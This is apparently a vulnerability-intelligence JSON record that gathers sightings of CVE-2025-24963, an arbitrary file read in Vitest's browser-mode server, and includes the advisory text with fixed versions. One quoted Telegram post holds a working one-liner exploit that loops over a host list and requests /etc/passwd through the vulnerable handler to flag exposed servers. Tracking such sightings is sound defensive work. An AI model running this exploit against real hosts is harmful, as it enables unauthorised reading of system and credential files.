{"vulnerability": "cve-2025-24963", "sightings": [{"uuid": "22a9a22a-92a0-45b8-a89a-cb00941df761", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2025/CVE-2025-24963.yaml", "content": "", "creation_timestamp": "2025-02-05T13:18:32.000000Z"}, {"uuid": "8f0b5467-8cbb-49cb-ba13-f83597fbfc57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "seen", "source": "https://t.me/cvedetector/17229", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24963 - Vitest Remote File Disclosure\", \n  \"Content\": \"CVE ID : CVE-2025-24963 \nPublished : Feb. 4, 2025, 8:15 p.m. | 59\u00a0minutes ago \nDescription : Vitest is a testing framework powered by Vite. The `__screenshot-error` handler on the browser mode HTTP server that responds any file on the file system. Especially if the server is exposed on the network by `browser.api.host: true`, an attacker can send a request to that handler from remote to get the content of arbitrary files.This `__screenshot-error` handler on the browser mode HTTP server responds any file on the file system. This code was added by commit `2d62051`. Users explicitly exposing the browser mode server to the network by `browser.api.host: true` may get any files exposed. This issue has been addressed in versions 2.1.9 and 3.0.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 5.9 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"04 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-04T22:15:12.000000Z"}, {"uuid": "8b4900a1-3004-4afb-9627-58bb334963e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "published-proof-of-concept", "source": "Telegram/m_VX8ITBtSBz-wC_458XeKLmc3TfY-HOZ02yPgCyfuW9sk0", "content": "", "creation_timestamp": "2025-04-23T21:00:07.000000Z"}, {"uuid": "7e4ad252-0194-4b2f-9aaf-4a68f2650cfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1686", "content": "", "creation_timestamp": "2025-02-12T22:58:21.000000Z"}, {"uuid": "6bb43849-4407-43a2-9025-1a6324c2f10a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "published-proof-of-concept", "source": "https://t.me/suboxone_chatroom/7441", "content": "\ud83d\udea8 CVE-2025-24963 - Vitest Browser Mode Local File Read \ud83d\udea8\n\n\ud83d\udca5One Liner Exploit: \ncat file.txt | while read host; do curl -skL \"http://$host/__screenshot-error?file=/etc/passwd\" | grep -E \"root:.*:/bin/\" && echo \"$host is VULN\"; done", "creation_timestamp": "2025-04-01T12:37:26.000000Z"}, {"uuid": "1f15e8d6-1cd7-45a7-a805-268a2c0436f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lheur3fp7v2c", "content": "", "creation_timestamp": "2025-02-04T20:16:12.108941Z"}, {"uuid": "9d6fc2e2-0214-44f3-ba78-bb80fd2cbc2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lhf3uwufkd2z", "content": "", "creation_timestamp": "2025-02-04T22:23:45.001250Z"}, {"uuid": "c62d12dc-f42b-4c85-8f76-d22d59985011", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lhu24itt3h2o", "content": "", "creation_timestamp": "2025-02-10T21:02:01.841420Z"}]}